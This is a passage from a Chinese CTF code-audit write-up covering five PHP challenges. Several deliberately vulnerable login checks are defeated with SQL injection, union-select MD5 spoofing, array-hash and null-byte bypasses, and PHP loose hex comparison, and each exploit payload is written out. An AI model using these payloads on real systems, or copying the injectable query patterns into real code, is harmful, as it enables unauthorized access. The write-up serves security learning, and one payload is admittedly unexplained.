一、分段代码审计(4)

十六、SQL注入or绕过

<?php
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';
function clean($str){
    if(get_magic_quotes_gpc()){ //get_magic_quotes_gpc — 获取当前 magic_quotes_gpc 的配置选项设置
        $str=stripslashes($str); //返回一个去除转义反斜线后的字符串(\' 转换为 ' 等等)。双反斜线(\\)被转换为单个反斜线(\)。 
    }
    return htmlentities($str, ENT_QUOTES);
}
$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);
//$query='SELECT * FROM users WHERE name=\''admin\'\' AND pass=\''or 1 #'\';';
$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}
echo $flag;
?>

magic_quotes_gpc 魔术引号开关
在magic_quotes_gpc = On的情况下,如果输入的数据有单引号(')、双引号(")、反斜线(\)与 NULL(NULL 字符)都会被加上反斜线

payload:?username=admin\'\' AND pass=\''or 1 #&password=(暂时不清楚什么情况)

十七、密码md5比较绕过

<?php
if($_POST[user] && $_POST[pass]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user=' $user '"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
    //strcasecmp:0 - 如果两个字符串相等
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>

要得到flag,我们需要让数据库中取出来的数据$query[pw]md5($_POST[pass])相等。
因为sql语句并没有进行任何过滤,我们可以使用union select控制返回的结果。
payload:?user='and 0=1 union select 'e10adc3949ba59abbe56e057f20f883e' #&pass=123456
执行的sql语句为select pw from ctf where user=''and 0=1 union select 'e10adc3949ba59abbe56e057f20f883e' # and 0=1是为了让前面的语句没有返回结果,后面的语句控制了输出结果为e10adc3949ba59abbe56e057f20f883e,这一串字符是123456md5加密后的字符,所以只要让pass=123456就可以满足条件。

十八、md5()函数===使用数组绕过

<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
    if ($_GET['username'] == $_GET['password'])
        print 'Your password can not be your username.';
    else if (md5($_GET['username']) === md5($_GET['password']))
        die('Flag: '.$flag);
    else
        print 'Invalid password';
}
?>

前面提到过如果是==时可以用0exxxxx的方式绕过,但这里是===,只能利用php对数组进行hash运算会返回NULL的特性进行,将name和password分别赋两个不同的数组,这样就满足他两个不相同但加密后的值却相同
payload:?username[]=1&password[]=2

十九、ereg()函数strpos() 函数用数组返回NULL绕过

<?php  
$flag = "flag";  
   
if (isset ($_GET['password'])) {  
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)  
        echo 'You password must be alphanumeric';  
    else if (strpos ($_GET['password'], '--') !== FALSE)  
        die('Flag: ' . $flag);  
    else  
        echo 'Invalid password';  
}  
?>
  • 方法一:ereg()正则函数可以用%00截断,前面已经提到很多次了,这里就不多说了,payload:?password=1%00--
  • 方法二:ereg和strpos函数传入数组后返回的都是NULL,NULL === FALSE 不成立,进入下一个判断,NULL !==FLASE成立,返回Flag,payload:password[]=

二十、十六进制与数字比较

<?php
error_reporting(0);
function noother_says_correct($temp)
{
    $flag = 'flag{test}';
    $one = ord('1');  //ord — 返回字符的 ASCII 码值
    $nine = ord('9'); //ord — 返回字符的 ASCII 码值
    $number = '3735929054';
    // Check all the input characters!
    for ($i = 0; $i < strlen($number); $i++)
    { 
        // Disallow all the digits!
        $digit = ord($temp{$i});
        if ( ($digit >= $one) && ($digit <= $nine) )
        {
            // Aha, digit not allowed!
            return "flase";
        }
    }
    if($number == $temp)
        return $flag;
}
$temp = $_GET['password'];
echo noother_says_correct($temp);
?>

可以看出让我们输入password,password通过一个for循环进行了限制,每一位不可以大于等于1小于等于9。
后面又要求password=='3735929054',把这一串数据转换为16进制后得到0xeadc0de(0x代表16进制),这一串字符每一位都满足不可以大于等于1小于等于9。
payload:?password=0xdeadc0de

推荐阅读更多精彩内容

  • 2018/3/16 17:34:51 WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获...
    Sec小玖阅读 20,991评论 1 11
  • 古斯塔斯。勒庞,法国著名社会心理学家。写过很多社会心理学方面的著作,以本书最为有名。一百多年前的法国学者勒庞是个保...
    星期六早晨阅读 463评论 0 0
  • 你拍着胸脯说没问题,看到结果时我眼泪差点流下来 生活中,有一些朋友,他们在某一方面总能给我们很靠谱的感觉 记不住的...
    牧羊Max阅读 128评论 0 0
  • 从明天起,做一个这样的人:率性而行,继之而悟,随遇而安。以最自然的姿态和意愿去生活,你会发现内心深处的快乐,将不可...
    张志琴阅读 76评论 0 0